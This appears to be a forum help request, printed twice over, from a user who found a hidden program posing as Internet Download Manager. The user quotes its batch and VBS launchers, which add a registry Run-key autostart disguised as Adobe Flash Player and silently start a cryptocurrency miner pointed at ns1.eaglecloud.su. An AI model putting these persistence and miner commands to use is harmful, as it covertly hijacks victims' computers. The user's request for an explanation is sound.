Good Morning All,
My system was really slow one morning. Task manager showed that Internet Download Manager was running even though I never install it. I found it's location in "users/(my account)/appdata/roaming/adobe/flashplayer/purecache". It was taking quite a bit of the CPU.
A search on the net showed that it was probably some kind of malware script that was running. It started itself every time I booted up in the morning through an entry in the registry. I don't know how long I've had it on my system.
The bat file that started it was:
@echo off
%windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v AdobeFlashPlayer /d "wscript \"%appdata%\Adobe\Flash Player\PureCache\IDMan.vbs\" \"%appdata%\Adobe\Flash Player\PureCache\IDMan.bat\"" /f
start /b /normal "a" "%appdata%\Adobe\Flash Player\PureCache\IDMan.exe" -o stratum+tcp://ns1.eaglecloud.su:9327 -u LZA8F5DgmTCTbdUR1AXpnvuVVFEXbKxcNH -p x
The vbs script file in the same folder as the bat file was:
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
I have since removed all of the entries from my system, but am concerned about what may have been happening, as I don't know how long this has been on my system.
I know this is a trojan of some kind. But could someone please interpret the bat and script files for me and what information these are sending to ns1.eaglecould.su.
Thank you
My system was really slow one morning. Task manager showed that Internet Download Manager was running even though I never install it. I found it's location in "users/(my account)/appdata/roaming/adobe/flashplayer/purecache". It was taking quite a bit of the CPU.
A search on the net showed that it was probably some kind of malware script that was running. It started itself every time I booted up in the morning through an entry in the registry. I don't know how long I've had it on my system.
The bat file that started it was:
@echo off
%windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v AdobeFlashPlayer /d "wscript \"%appdata%\Adobe\Flash Player\PureCache\IDMan.vbs\" \"%appdata%\Adobe\Flash Player\PureCache\IDMan.bat\"" /f
start /b /normal "a" "%appdata%\Adobe\Flash Player\PureCache\IDMan.exe" -o stratum+tcp://ns1.eaglecloud.su:9327 -u LZA8F5DgmTCTbdUR1AXpnvuVVFEXbKxcNH -p x
The vbs script file in the same folder as the bat file was:
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
I have since removed all of the entries from my system, but am concerned about what may have been happening, as I don't know how long this has been on my system.
I know this is a trojan of some kind. But could someone please interpret the bat and script files for me and what information these are sending to ns1.eaglecould.su.
Thank you